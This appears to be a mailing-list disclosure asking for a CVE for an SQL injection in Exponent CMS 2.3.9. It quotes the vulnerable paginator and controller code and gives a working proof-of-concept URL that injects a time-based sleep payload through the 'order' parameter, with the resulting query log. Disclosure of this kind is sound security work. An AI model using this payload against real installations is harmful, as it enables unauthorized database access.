oss-sec mailing list archives
CVE request - Exponent CMS 2.3.9 SQL injection
From: 王禹哲 <0xtom4to () gmail com>
Date: Mon, 19 Sep 2016 08:17:53 -0400
Author: Tomato jianing.wang () chaitin com Data: 2016–09–19 Version: 2.3.9 and earlier /exponent–2.3.9/framework/core/subsystems/expPaginator.php if (strstr($this->order," ")) { $orderby = explode(" ",$this->order); $this->order = $orderby[0]; $this->order_direction = $orderby[1]; } if ($this->dontsort) $sort = null; else $sort = $this->order.' '.$this->order_direction; // figure out how many records we're dealing with & grab the records //if (!empty($this->records)) { //from Merge <~~ this doesn't work. Could be empty, but still need to hit. if (!empty($this->categorize)) $limit = null; else $limit = $this->limit; if (isset($params['records'])) { // if we pass $params['records'], we WANT to hit this // sort the records that were passed in to us if (!empty($sort)) usort($this->records,array('expPaginator', strtolower($this->order_direction))); // $this->total_records = count($this->records); } elseif (!empty($class)) { //where clause //FJD: was $this->class, but wasn't working... $this->total_records = $class->find('count', $this->where); $this->records = $class->find('all', $this->where, $sort, $limit, $this->start); } elseif (!empty($this->where)) { //from Merge....where clause $this->total_records = $class->find('count', $this->where); $this->records = $class->find('all', $this->where, $sort, $limit, $this->start); } else { //sql clause //FIXME we don't get attachments in this approach //$records = $db->selectObjectsBySql($this->sql); //$this->total_records = count($records); //this is MUCH faster if you supply a proper count_sql param using a COUNT() function; if not, //we'll run the standard sql and do a queryRows with it //$this->total_records = $this->count_sql == '' ? $db->queryRows($this->sql) : $db->selectValueBySql($this->count_sql); //From Merge // $this->total_records = $db->countObjectsBySql($this->count_sql); //$db->queryRows($this->sql); //From most current Trunk if (!empty($sort)) $this->sql .= ' ORDER BY '.$sort; i can controller $order ,i can use this parameter to sql injection such as exponent–2.3.9/framework/modules/company/controllers/companyController.php function showall() { expHistory::set('viewable', $this->params); $page = new expPaginator(array( 'model'=>$this->basemodel_name, 'where'=>1, 'limit'=>(isset($this->params['limit']) && $this->config['limit'] != '') ? $this->params['limit'] : 10, 'order'=>isset($this->params['order']) ? $this->params['order'] : 'rank', 'page'=>(isset($this->params['page']) ? $this->params['page'] : 1), 'controller'=>$this->baseclassname, 'action'=>$this->params['action'], 'columns'=>array( gt('Manufacturer')=>'title', gt('Website')=>'website' ), )); assign_to_template(array( 'page'=>$page, 'items'=>$page->records )); } the poc is http://127.0.0.1/exponent-2.3.9/index.php?controller=company&action=showall&limit=1&order=(select/**/*/**/from/**/(select/**/sleep(5))x)%23 in the mysql log we can see this SELECT * FROM exponent_companies WHERE 1 ORDER BY (select/**/*/*/from/*/(select/**/sleep(5))x)# ASC LIMIT 0,10 Could you assign CVE id for this? Regards, Tomato
Current thread:
- CVE request - Exponent CMS 2.3.9 SQL injection 王禹哲 (Sep 19)